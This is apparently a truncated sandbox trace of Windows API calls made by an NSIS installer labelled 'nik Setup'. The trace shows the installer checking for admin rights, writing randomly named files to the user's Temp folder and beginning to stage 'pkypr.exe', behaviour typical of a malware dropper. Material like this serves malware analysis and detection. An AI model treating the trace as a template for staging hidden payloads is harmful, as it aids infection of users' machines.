lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0112.807] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0112.807] lstrcpynW (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0112.807] LoadImageW (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x4035f [0112.811] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0112.812] lstrlenW (lpString="nik") returned 3 [0112.812] lstrcpynW (in: lpString1=0x429220, lpString2="nik Setup", iMaxLength=1024 | out: lpString1="nik Setup") returned="nik Setup" [0112.812] SetWindowTextW (hWnd=0x0, lpString="nik Setup") returned 0 [0112.812] lstrcpynW (in: lpString1=0x592e64, lpString2="cwocdmsgmtvpp", iMaxLength=1024 | out: lpString1="cwocdmsgmtvpp") returned="cwocdmsgmtvpp" [0112.812] lstrcpynW (in: lpString1=0x59367c, lpString2="ldjvyogoxi", iMaxLength=1024 | out: lpString1="ldjvyogoxi") returned="ldjvyogoxi" [0112.812] lstrcpynW (in: lpString1=0x593e94, lpString2="lamjoviqbpode", iMaxLength=1024 | out: lpString1="lamjoviqbpode") returned="lamjoviqbpode" [0112.812] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0112.812] GetSystemDirectoryW (in: lpBuffer=0x19f914, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.812] wsprintfW (in: param_1=0x19f93a, param_2="%s%S.dll" | out: param_1="\\RichEd20.dll") returned 13 [0112.812] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6c9e0000 [0113.697] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x4291c0 | out: lpWndClass=0x4291c0) returned 1 [0113.698] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403f64, dwInitParam=0x0) returned 0x0 [0114.565] GetDlgItem (hDlg=0x7025a, nIDDlgItem=1) returned 0x501fc [0114.565] GetDlgItem (hDlg=0x7025a, nIDDlgItem=2) returned 0x90270 [0114.565] SetDlgItemTextW (hDlg=0x7025a, nIDDlgItem=1028, lpString="Nullsoft Install System v3.08") returned 1 [0114.566] SetClassLongW (hWnd=0x7025a, nIndex=-14, dwNewLong=263007) returned 0x0 [0114.572] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.572] lstrlenW (lpString="") returned 0 [0114.572] lstrcpynW (in: lpString1=0x40b5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.572] lstrcpynW (in: lpString1=0x40bdc8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.573] lstrcmpiW (lpString1="", lpString2="") returned 0 [0114.573] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.573] lstrlenW (lpString="") returned 0 [0114.573] lstrcpynW (in: lpString1=0x5ada5c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.573] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0114.573] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0114.573] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.573] GetTickCount () returned 0x1c50c97 [0114.573] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nst", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp")) returned 0xc98 [0114.597] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.597] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0114.597] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.597] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.598] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0114.598] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0c0b21, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac0c0b21, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac0c0b21, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nstC98.tmp", cAlternateFileName="")) returned 0x57e970 [0114.599] FindClose (in: hFindFile=0x57e970 | out: hFindFile=0x57e970) returned 1 [0114.599] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp")) returned 1 [0114.599] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.599] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0114.599] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.600] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0114.600] GetLastError () returned 0xb7 [0114.600] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0114.600] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0114.600] GetLastError () returned 0xb7 [0114.600] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0114.601] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0114.601] GetLastError () returned 0xb7 [0114.601] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0114.601] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0114.601] GetLastError () returned 0xb7 [0114.601] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0114.601] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0114.601] GetLastError () returned 0xb7 [0114.601] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0114.602] GetModuleHandleA (lpModuleName="SHELL32") returned 0x75db0000 [0114.602] GetProcAddress (hModule=0x75db0000, lpProcName=0x2a8) returned 0x7605db90 [0114.602] IsUserAnAdmin () returned 1 [0114.602] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp"), lpSecurityAttributes=0x19f0d8) returned 1 [0114.604] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.604] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0114.604] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.604] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0114.604] lstrcpynW (in: lpString1=0x438000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0114.604] lstrcpynW (in: lpString1=0x42b000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0114.605] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.605] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0114.605] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.605] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0114.605] GetLastError () returned 0xb7 [0114.605] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0114.605] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0114.605] GetLastError () returned 0xb7 [0114.605] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0114.606] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0114.606] GetLastError () returned 0xb7 [0114.606] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0114.606] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0114.606] GetLastError () returned 0xb7 [0114.606] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0114.606] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0114.606] GetLastError () returned 0xb7 [0114.606] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0114.607] lstrcpynW (in: lpString1=0x436000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.607] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0114.607] lstrcpynW (in: lpString1=0x40bdc8, lpString2="ow7v8lrfalu0lz3762", iMaxLength=1024 | out: lpString1="ow7v8lrfalu0lz3762") returned="ow7v8lrfalu0lz3762" [0114.607] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.607] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0114.607] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0114.607] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="ow7v8lrfalu0lz3762" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762" [0114.608] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ow7v8lrfalu0lz3762")) returned 0xffffffff [0114.608] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ow7v8lrfalu0lz3762")) returned 0xffffffff [0114.608] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ow7v8lrfalu0lz3762"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0114.608] SetFilePointer (in: hFile=0x210, lDistanceToMove=38607, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x96cf [0114.609] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0114.609] GetTickCount () returned 0x1c50cc6 [0114.609] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.695] GetTickCount () returned 0x1c50d14 [0114.695] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x548c, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x548c, lpOverlapped=0x0) returned 1 [0114.697] GetTickCount () returned 0x1c50d14 [0114.697] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.700] GetTickCount () returned 0x1c50d14 [0114.700] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x437c, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x437c, lpOverlapped=0x0) returned 1 [0114.701] GetTickCount () returned 0x1c50d14 [0114.701] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.704] GetTickCount () returned 0x1c50d23 [0114.704] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4498, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4498, lpOverlapped=0x0) returned 1 [0114.705] GetTickCount () returned 0x1c50d23 [0114.705] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.707] GetTickCount () returned 0x1c50d23 [0114.708] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4639, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4639, lpOverlapped=0x0) returned 1 [0114.709] GetTickCount () returned 0x1c50d23 [0114.709] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.712] GetTickCount () returned 0x1c50d23 [0114.712] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4590, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4590, lpOverlapped=0x0) returned 1 [0114.712] GetTickCount () returned 0x1c50d23 [0114.712] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.726] GetTickCount () returned 0x1c50d33 [0114.726] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x47d7, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x47d7, lpOverlapped=0x0) returned 1 [0114.727] GetTickCount () returned 0x1c50d33 [0114.727] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.730] GetTickCount () returned 0x1c50d33 [0114.730] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x42f5, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x42f5, lpOverlapped=0x0) returned 1 [0114.731] GetTickCount () returned 0x1c50d33 [0114.731] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.734] GetTickCount () returned 0x1c50d43 [0114.734] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f14, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f14, lpOverlapped=0x0) returned 1 [0114.735] GetTickCount () returned 0x1c50d43 [0114.735] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.738] GetTickCount () returned 0x1c50d43 [0114.738] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f24, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f24, lpOverlapped=0x0) returned 1 [0114.739] GetTickCount () returned 0x1c50d43 [0114.739] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0114.742] GetTickCount () returned 0x1c50d43 [0114.742] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f1d, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f1d, lpOverlapped=0x0) returned 1 [0114.742] GetTickCount () returned 0x1c50d43 [0114.742] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x3172, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x3172, lpOverlapped=0x0) returned 1 [0114.744] GetTickCount () returned 0x1c50d43 [0114.744] MulDiv (nNumber=176498, nNumerator=100, nDenominator=176498) returned 100 [0114.744] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0114.744] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3375, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3375, lpOverlapped=0x0) returned 1 [0114.745] GetTickCount () returned 0x1c50d43 [0114.745] MulDiv (nNumber=176498, nNumerator=100, nDenominator=176498) returned 100 [0114.745] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0114.745] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0114.745] CloseHandle (hObject=0x28) returned 1 [0114.756] lstrcpynW (in: lpString1=0x40bdc8, lpString2="zpcthwca", iMaxLength=1024 | out: lpString1="zpcthwca") returned="zpcthwca" [0114.756] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.756] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0114.756] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0114.756] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="zpcthwca" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" [0114.756] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\zpcthwca")) returned 0xffffffff [0114.756] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\zpcthwca")) returned 0xffffffff [0114.757] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\zpcthwca"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0114.757] SetFilePointer (in: hFile=0x210, lDistanceToMove=215109, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x34845 [0114.757] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0114.757] GetTickCount () returned 0x1c50d52 [0114.757] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0xa58, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0xa58, lpOverlapped=0x0) returned 1 [0114.931] GetTickCount () returned 0x1c50dfe [0114.931] MulDiv (nNumber=2648, nNumerator=100, nDenominator=2648) returned 100 [0114.931] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0114.931] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x136b, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x136b, lpOverlapped=0x0) returned 1 [0114.933] GetTickCount () returned 0x1c50dfe [0114.933] MulDiv (nNumber=2648, nNumerator=100, nDenominator=2648) returned 100 [0114.933] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0114.933] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0114.933] CloseHandle (hObject=0x28) returned 1 [0114.935] lstrcpynW (in: lpString1=0x40bdc8, lpString2="pkypr.exe", iMaxLength=1024 | out: lpString1="pkypr.exe") returned="pkypr.exe" [0114.935] lstrcpynW (in: 